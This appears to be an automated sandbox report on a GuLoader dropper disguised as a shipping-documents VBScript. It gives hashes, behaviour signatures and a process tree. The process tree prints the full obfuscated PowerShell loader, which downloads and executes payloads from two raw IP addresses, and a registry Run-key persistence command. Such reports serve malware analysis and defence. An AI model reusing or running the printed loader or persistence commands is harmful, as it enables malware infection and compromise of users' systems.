Analysis

  • max time kernel
    160s
  • max time network
    162s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25/03/2024, 13:15

General

  • Target

    awb_shipping_documents_25_03_2024_000000000.vbs

  • Size

    237KB

  • MD5

    937285e67679dcbd6d3a218cff5723e4

  • SHA1

    73023fa293fc84f1db845a75a4be3c2337c8da4d

  • SHA256

    d90f3ab705edef2a59cc39b6269f1a149f0f6e43e0aa4f128d05c1697726bcdb

  • SHA512

    607ea5c0cf19a5776d60c15942c28b5e9433e52f72abad0b250d7abb72f98721210d328c6915051cd9b2fa215a938ed64eebb20de3dc6b9511f2a2fa3cb1b773

  • SSDEEP

    6144:lyhQMLtOBxJrv5lttSP4KuK8jWwoipSRUiGT9rS2fTicm7jImE9uAI:ekVBDjI

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_documents_25_03_2024_000000000.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3768
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patchy Corporis Vergaloo #>;<#sndagsskolers Paws Alexandrite Skit #>;New-Item -Path 'reservats:\Forfaldt' -Name 'Tiptipoldemoders' -ItemType 'file';<#Conto Perty Rkefjolss blencorn Vitrinernes #>;Function Tulipa ([String]$superofficiously){$Urikonografi = 2;For($Uri=1; $Uri -lt $superofficiously.Length-1; $Uri+=$Urikonografi){ $Urstrukturens = $superofficiously.Substring($Uri, $Forkhead); $Distingverende80=$Distingverende80+$Urstrukturens; }$Distingverende80;}$Forkhead = (cmd /c 'echo 1 && exit');if (Test-Path 'reservats:\Forfaldt\Tiptipoldemoders') {$Forkhead--};$Agillawood224=Tulipa ' i,eRxE ';$Outfound=Tulipa '.TSr a n,s fVeSr,rDi,nDg, ';$Monochordist = Tulipa 'A\Ss yDs wUoJw 6S4H\FW i.n,dHoFw,s PBo,wFePrPSFh,eTl l \Gv 1,. 0K\SpdoAwse,r.sKhue l.lB. e xVe. ';function Forefather ($Firetages){. ($Agillawood224) ($Firetages);}$Strangler=Tulipa '.hPtPtApR: /./V1 4.7D.r7P8.. 1 0h3U.A2 5 0R/ S pUr r eUr eNg e lo. pRsPdB>shGtStOp.: /P/I8.5,.F2 0r9 . 1S7,6M.O4.6,/GSTpCr.r e rSe g,eSl .Sp s.dS ';$Formbrndselsfabrikken236=$Strangler.split([char]62);$Strangler=$Formbrndselsfabrikken236[0];Forefather (Tulipa ' $CgPlSo.bDaBld:BF y sHi,oJt eSrBaGp,eSu.tEsDk oWlRe r =K$AeRnUv.: wTiUntdFiEr ') ;Forefather (Tulipa ' $ g l.opbTa l.:BL,eHvHiSnRe r = $ F yAsHi oRtne rSa,pLeFuPt s kUoMl eFr.+ $AM o n,o cDh,o r dLi s tN ') ;Forefather (Tulipa 'T$ gUlNo b afl :RHPaSa nAd.vArSkNe tEs .=A ,( (Kg wAm iS w iDnU3 2,_,p r.o.c eMs s. -,F. P,rSoZcNeGs s I d =D$,{PP IKD,} )A. C o m m aHn d.L,i n e.). .- s,p lMi t. 
b[.cPh aJr ] 3B4E ');Forefather (Tulipa ' $ g.lFoCb.a,lg: R dUtA1I8.5D .=, T$AH.aSa n d v r.k e t s [ $ H,aOaSn dLvGrBkEeTt s .FcBo,u.nEtV-M2S] ');Forefather (Tulipa 'A$tgPlRo b,a.l.: OHvhe.rVb eAf oAl k nMiSnSg.eSn,s = (,TOe s t - P,aTt hB .$ L.eVvUifnBe rM) F- AAn dT T(.[ I nst PDtAr ] :P: sKiKzOe M- eEqF 8E) ') ;if ($Overbefolkningens) {& $Leviner $Rdt185;} else {;$Genealogists=Tulipa 'A$ g,l,oTbNa l : M.iGn,i,f iseTdJ ,= ,SAt.a r tS-PB iLtAseTarSa nRs f eNr. -NSToFu r,c e, G$ISOt r a n g,lUe r. -DDSeBs t iknSa tvi.oLn, O$ FEyMs i o t.e,rRaep.eOuPtSs.k,o.l.e.rB ';Forefather (Tulipa '.$Ag lVo b.aTlM: FLySsfiToIt e,rMaFp,eSu.tOsBkRoklbeMr = $,eonKv :Sa pCp d aSt aE ') ;Forefather (Tulipa '.I mMpOowrOtT-.M o dTuAl.e, BEiStEs,T rMa n s f e.rG ') ;$Fysioterapeutskoler=$Fysioterapeutskoler+'\Judicial.Ara' ;Forefather (Tulipa ',$,g l.o b,a lA:ICThDoUl eSlTiItAh.odt.o.m yn= (ST,e sEtN-,P.aGt hS ,$VF,ySsUi,oRt,eAr a.pVeSuNtesTkBo,l e r ), ') ;while (-not $Cholelithotomy) {Forefather (Tulipa ' IAf ( $TM i.n.i fPi eBdK.DJ opbAS.t.aDt ei -Re qH ,$.OWu tNf o u,n d.)F K{YS.tPa,r.tc- SClDeBeVp M1C} etlAs.eN{SSOt a,r tf-NS l eFe pB 1S;TFSoSrBe f aPt h,e.rP ,$.GBeEn.e a lKo g i sot sA}D ');Forefather (Tulipa 'F$Eg.lHokb.a lP:aC hHo,l eMl iVtKhSo tSoRm y = (,T,e s t.-.P aNt,hM K$ FNy,s i ovt eTr.a.pCe u t s k oBlKe r )S ') ;$Strangler=$Formbrndselsfabrikken236[$Precompiler++%$Formbrndselsfabrikken236.count];}Forefather (Tulipa '.$Ggal o,bSaOlA:UP aDsFs.a gHe.r eCrPnRe.sN t=D TGNeAtT-BC o nutUeQn.tD D$,FAy,s iSo.t,e r alpFeRuEtSs.k oIl,eNr ');Forefather (Tulipa 'K$Hg lDo.bBaPlN:DD.uGr o mOeLtHe,rRs = [.S yVsStPe m,. C,o nBv e rDt.]D:R: F ruo,m BPaKs e,6O4DSPtLrSiNnFg (J$ P aGsTs a.gteUr eBr.n e s,) ');Forefather (Tulipa 'I$,g lWo bBaOl.:,V.aSlCm.u.eB S=f S[.SRyFs t eUmB.,TSe x tK. 
E nFcuo,d iHnKg ].:P:UAPSTC.IVIS.,G.eSt.SFtTr i,n.g (.$ DHu,r.o.m eHtReDrKs )H ');Forefather (Tulipa ' $ g l.o,bPaAl,:SCueNp.h a.l o,cHhCoSr dEaS=A$,V a.lEm,uSe,.Ps,u b,s tUrHiFnKg (.2E9R1I1M8L6S, 2 3K4S0E0C)S ');Forefather $Cephalochorda;};;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1188
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo 1 && exit"
        3⤵
          PID:4512
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Patchy Corporis Vergaloo #>;<#sndagsskolers Paws Alexandrite Skit #>;New-Item -Path 'reservats:\Forfaldt' -Name 'Tiptipoldemoders' -ItemType 'file';<#Conto Perty Rkefjolss blencorn Vitrinernes #>;Function Tulipa ([String]$superofficiously){$Urikonografi = 2;For($Uri=1; $Uri -lt $superofficiously.Length-1; $Uri+=$Urikonografi){ $Urstrukturens = $superofficiously.Substring($Uri, $Forkhead); $Distingverende80=$Distingverende80+$Urstrukturens; }$Distingverende80;}$Forkhead = (cmd /c 'echo 1 && exit');if (Test-Path 'reservats:\Forfaldt\Tiptipoldemoders') {$Forkhead--};$Agillawood224=Tulipa ' i,eRxE ';$Outfound=Tulipa '.TSr a n,s fVeSr,rDi,nDg, ';$Monochordist = Tulipa 'A\Ss yDs wUoJw 6S4H\FW i.n,dHoFw,s PBo,wFePrPSFh,eTl l \Gv 1,. 0K\SpdoAwse,r.sKhue l.lB. e xVe. ';function Forefather ($Firetages){. ($Agillawood224) ($Firetages);}$Strangler=Tulipa '.hPtPtApR: /./V1 4.7D.r7P8.. 1 0h3U.A2 5 0R/ S pUr r eUr eNg e lo. pRsPdB>shGtStOp.: /P/I8.5,.F2 0r9 . 1S7,6M.O4.6,/GSTpCr.r e rSe g,eSl .Sp s.dS ';$Formbrndselsfabrikken236=$Strangler.split([char]62);$Strangler=$Formbrndselsfabrikken236[0];Forefather (Tulipa ' $CgPlSo.bDaBld:BF y sHi,oJt eSrBaGp,eSu.tEsDk oWlRe r =K$AeRnUv.: wTiUntdFiEr ') ;Forefather (Tulipa ' $ g l.opbTa l.:BL,eHvHiSnRe r = $ F yAsHi oRtne rSa,pLeFuPt s kUoMl eFr.+ $AM o n,o cDh,o r dLi s tN ') ;Forefather (Tulipa 'T$ gUlNo b afl :RHPaSa nAd.vArSkNe tEs .=A ,( (Kg wAm iS w iDnU3 2,_,p r.o.c eMs s. -,F. P,rSoZcNeGs s I d =D$,{PP IKD,} )A. C o m m aHn d.L,i n e.). .- s,p lMi t. 
b[.cPh aJr ] 3B4E ');Forefather (Tulipa ' $ g.lFoCb.a,lg: R dUtA1I8.5D .=, T$AH.aSa n d v r.k e t s [ $ H,aOaSn dLvGrBkEeTt s .FcBo,u.nEtV-M2S] ');Forefather (Tulipa 'A$tgPlRo b,a.l.: OHvhe.rVb eAf oAl k nMiSnSg.eSn,s = (,TOe s t - P,aTt hB .$ L.eVvUifnBe rM) F- AAn dT T(.[ I nst PDtAr ] :P: sKiKzOe M- eEqF 8E) ') ;if ($Overbefolkningens) {& $Leviner $Rdt185;} else {;$Genealogists=Tulipa 'A$ g,l,oTbNa l : M.iGn,i,f iseTdJ ,= ,SAt.a r tS-PB iLtAseTarSa nRs f eNr. -NSToFu r,c e, G$ISOt r a n g,lUe r. -DDSeBs t iknSa tvi.oLn, O$ FEyMs i o t.e,rRaep.eOuPtSs.k,o.l.e.rB ';Forefather (Tulipa '.$Ag lVo b.aTlM: FLySsfiToIt e,rMaFp,eSu.tOsBkRoklbeMr = $,eonKv :Sa pCp d aSt aE ') ;Forefather (Tulipa '.I mMpOowrOtT-.M o dTuAl.e, BEiStEs,T rMa n s f e.rG ') ;$Fysioterapeutskoler=$Fysioterapeutskoler+'\Judicial.Ara' ;Forefather (Tulipa ',$,g l.o b,a lA:ICThDoUl eSlTiItAh.odt.o.m yn= (ST,e sEtN-,P.aGt hS ,$VF,ySsUi,oRt,eAr a.pVeSuNtesTkBo,l e r ), ') ;while (-not $Cholelithotomy) {Forefather (Tulipa ' IAf ( $TM i.n.i fPi eBdK.DJ opbAS.t.aDt ei -Re qH ,$.OWu tNf o u,n d.)F K{YS.tPa,r.tc- SClDeBeVp M1C} etlAs.eN{SSOt a,r tf-NS l eFe pB 1S;TFSoSrBe f aPt h,e.rP ,$.GBeEn.e a lKo g i sot sA}D ');Forefather (Tulipa 'F$Eg.lHokb.a lP:aC hHo,l eMl iVtKhSo tSoRm y = (,T,e s t.-.P aNt,hM K$ FNy,s i ovt eTr.a.pCe u t s k oBlKe r )S ') ;$Strangler=$Formbrndselsfabrikken236[$Precompiler++%$Formbrndselsfabrikken236.count];}Forefather (Tulipa '.$Ggal o,bSaOlA:UP aDsFs.a gHe.r eCrPnRe.sN t=D TGNeAtT-BC o nutUeQn.tD D$,FAy,s iSo.t,e r alpFeRuEtSs.k oIl,eNr ');Forefather (Tulipa 'K$Hg lDo.bBaPlN:DD.uGr o mOeLtHe,rRs = [.S yVsStPe m,. C,o nBv e rDt.]D:R: F ruo,m BPaKs e,6O4DSPtLrSiNnFg (J$ P aGsTs a.gteUr eBr.n e s,) ');Forefather (Tulipa 'I$,g lWo bBaOl.:,V.aSlCm.u.eB S=f S[.SRyFs t eUmB.,TSe x tK. 
E nFcuo,d iHnKg ].:P:UAPSTC.IVIS.,G.eSt.SFtTr i,n.g (.$ DHu,r.o.m eHtReDrKs )H ');Forefather (Tulipa ' $ g l.o,bPaAl,:SCueNp.h a.l o,cHhCoSr dEaS=A$,V a.lEm,uSe,.Ps,u b,s tUrHiFnKg (.2E9R1I1M8L6S, 2 3K4S0E0C)S ');Forefather $Cephalochorda;};;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2648
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo 1 && exit"
            4⤵
              PID:4296
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:3620
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epizoa213" /t REG_EXPAND_SZ /d "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\antimakassar\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:184
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epizoa213" /t REG_EXPAND_SZ /d "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\antimakassar\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:1392
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4068 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8
        1⤵
          PID:3836

Network

MITRE ATT&CK Enterprise v15

Downloads

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_klf3aukr.vqi.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
